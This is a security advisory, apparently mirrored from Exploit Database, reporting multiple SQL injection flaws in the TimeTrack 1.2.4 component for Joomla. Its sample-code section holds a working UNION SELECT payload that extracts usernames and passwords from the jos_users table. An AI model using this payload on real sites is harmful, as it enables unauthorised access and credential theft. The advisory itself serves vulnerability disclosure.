Joomla! Component TimeTrack 1.2.4 – Multiple SQL Injections

• Exploit Database
• 12 阅读

• 作者： Salvatore Fresta
  日期： 2010-09-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15084/

• TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities
  
   NameTimeTrack
   Vendorhttp://www.itrn.de
   Versions Affected 1.2.4
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-09-22
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  ________________________
  
  TimeTrackisatime tracking Component for Joomla! 1.5
  tocollect,categorizeandevaluate working hours and
  services.MonthlyReports can generated and exported as
  PDF or CSV-File.
  
  
  II. DESCRIPTION
  _______________
  
  Many numeric parameters are not properly sanitised before
  beingusedinaSQLquery. Thiscan be exploited to
  manipulate SQL queries by injecting arbitrary SQL code.
  
  
  III. ANALYSIS
  _____________
  
  Summary:
  
   A) Multiple SQL Injection
   
  
  A) Multiple SQL Injection
  _________________________
  
  Eachmoduleisvulnerable to SQL Injection because all
  numeric fields are not sanitised.
  
  
  IV. SAMPLE CODE
  _______________
  
  A) Multiple SQL Injection
  
  http://host/path/components/index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
  
  
  V. FIX
  ______
  
  No fix.